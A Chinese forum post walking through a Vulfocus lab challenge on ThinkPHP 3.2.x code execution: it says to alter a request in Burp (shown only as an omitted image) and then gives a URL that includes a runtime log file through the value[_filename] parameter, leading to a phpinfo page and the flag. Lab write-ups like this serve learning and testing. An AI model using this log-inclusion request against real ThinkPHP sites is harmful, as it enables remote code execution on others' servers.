论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
ToB企服应用市场:ToB评测及商务社交产业平台
»
论坛
›
安全
›
网络安全
›
Vulfocus靶场 | thinkphp3.2.X代码执行
Vulfocus靶场 | thinkphp3.2.X代码执行
涛声依旧在
金牌会员
|
2022-9-16 17:16:48
|
显示全部楼层
|
阅读模式
楼主
主题
778
|
帖子
778
|
积分
2334
这里直接放通关姿势了,想了解具体原理可以看下参考链接
通关姿势
访问URL:
http://123.58.224.8:20275
burp抓包修改如下图:
接着访问:
[url=http://123.58.224.8:20275/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_08_06.log]http://123.58.224.8:20275/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_08_06.log[/url]
后面的“22_08_06”是我复现的日期,你根据日期做修改即可
访问后出现phpinfo页面
直接搜索“flag”
参考链接
【漏洞通报】ThinkPHP3.2.x RCE漏洞通报 (qq.com)
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
正序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
发新帖
回复
涛声依旧在
金牌会员
这个人很懒什么都没写!
楼主热帖
MySQL基本SQL语句之高级操作
maven配置步骤及问题
一文读懂K-Means原理与Python实现 ...
IOS OpenGL ES GPUImage 图像黑白色调 ...
大数据ETL开发之图解Kettle工具(入门 ...
Flink-基于 DataStream API 实现欺诈检 ...
Java 2023年接地气的中高级面试题一( ...
史上最全MongoDB之部署篇
为什么说 Go 语言字符串是不可变的? ...
学习ASP.NET Core Blazor编程系列二十 ...
标签云
挺好的
服务器
快速回复
返回顶部
返回列表